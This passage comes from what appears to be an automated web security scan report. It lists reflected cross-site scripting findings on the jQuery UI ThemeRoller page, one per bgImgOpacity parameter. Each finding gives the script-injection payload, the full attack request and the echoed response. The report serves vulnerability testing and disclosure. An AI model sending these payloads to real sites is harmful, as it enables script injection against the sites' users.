at.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD4ded7"><script>alert(1)</script>e2d451684&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

3.21. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11a4e"><script>alert(1)</script>52f07625338 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=10011a4e"><script>alert(1)</script>52f07625338&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=10011a4e"><script>alert(1)</script>52f07625338&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333
...[SNIP]...

3.22. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995ba"><script>alert(1)</script>4c057cb328e was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100995ba"><script>alert(1)</script>4c057cb328e&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
DD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100995ba"><script>alert(1)</script>4c057cb328e&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconCo
...[SNIP]...

3.23. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ebc5"><script>alert(1)</script>eac71f79849 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=502ebc5"><script>alert(1)</script>eac71f79849&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
TextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=502ebc5"><script>alert(1)</script>eac71f79849&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=F
...[SNIP]...

3.24. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7d26"><script>alert(1)</script>9819ffd82a was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100f7d26"><script>alert(1)</script>9819ffd82a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100f7d26"><script>alert(1)</script>9819ffd82a&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png
...[SNIP]...

3.25. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0704"><script>alert(1)</script>a3a7395d188 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20f0704"><script>alert(1)</script>a3a7395d188&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:37 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20f0704"><script>alert(1)</script>a3a7395d188&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=6
...[SNIP]...

3.26. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3af5a"><script>alert(1)</script>8c485dccd0a was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=203af5a"><script>alert(1)</script>8c485dccd0a&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=203af5a"><script>alert(1)</script>8c485dccd0a&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B100
...[SNIP]...

3.27. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c33d8"><script>alert(1)</script>f1bc2116d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50c33d8"><script>alert(1)</script>f1bc2116d7&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120319

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50c33d8"><script>alert(1)</script>f1bc2116d7&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055
...[SNIP]...

3.28. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34b50"><script>alert(1)</script>5a9fde23895 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=034b50"><script>alert(1)</script>5a9fde23895&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120322

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=034b50"><script>alert(1)</script>5a9fde23895&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" t
...[SNIP]...

3.29. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862b5"><script>alert(1)</script>264ef754561 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100862b5"><script>alert(1)</script>264ef754561&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:14:27 GMT
Content-Type: text/html
